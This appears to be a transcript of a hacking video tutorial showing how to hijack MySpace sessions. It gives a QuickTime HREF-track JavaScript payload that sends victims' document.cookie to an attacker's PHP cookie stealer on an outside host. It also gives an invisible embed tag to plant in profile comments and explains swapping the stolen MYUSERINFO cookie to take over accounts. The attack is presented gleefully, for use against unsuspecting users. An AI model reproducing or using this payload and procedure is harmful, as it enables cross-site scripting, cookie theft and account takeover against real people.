A host that allows php hosting and write capabilities
A PHP Cookie Stealer
Quicktime Pro

Today I will show you how to hack myspace through cookie stealing Session Hijacking.

First you must obtain a php cookie stealer. If you dont know how to code in php, you can obtain one in HERE
Lets get Started...

First we obtain a cookie stealer... for thos who dont know how to code in php

Greets to System_meltdown and Hellboundhackers!

Now we craft the quicktime exploit

First we make a textfile with javascript parameters, which will redirect to the cookie stealer.

A<javascript:window.location='http://texasholdem.php0h.com/cookies.php?c='+escape(document.cookie);> T<>
This redirects to my cookie stealer.. as you can see it contains quicktime param.

now that we have it... we need to hide the text. So it doesnt appear and the user doesnt know whats happening.
Go to Window --> Movie Properties and then uncheck the Text Track and rename it HREFTrack.

Now that we have crafted it... we upload to out server.

ok done. now we comment the target.

We will use the embed tag to play the movie (XSS Backdoor), which will redirect to our cookie stealer...

<embed allowScriptAccess="never" allowNetworking="internal" enableJSURL="false" src="http://myspace12.php0h.com/exploit.mov" width="0px" height="0px"></embed>

We embed the html code into the comment... as soon as this person sees the comment their cookies are ourS!!!!! hehehehe

Now we just wait.

After a wwhile check the ouputed .htm the php cookie stealer made.. cookies.htm

Now we need MYUSERINFO... which contains all the session data.. once you replce yours with theirs... you have hijacked their session.

That is our victim!!!

Now lets hope weve got it


Ok now you need a cookie editor... try to get an extension from mozill'a site.

This is what MYUSERINFO looks like...


That is the data we need to replace.

Refresh and.... voila... session hijacked!!!!

but as you ca see you can only do a bit w/ the profile like comment and message.. and edit the profile...

hmm lets see...

hehehe done!!!!

Video made by Insidious

Greets to Bugz and All HBH Users!!!

AIM: insidious888

Hope you had fun!!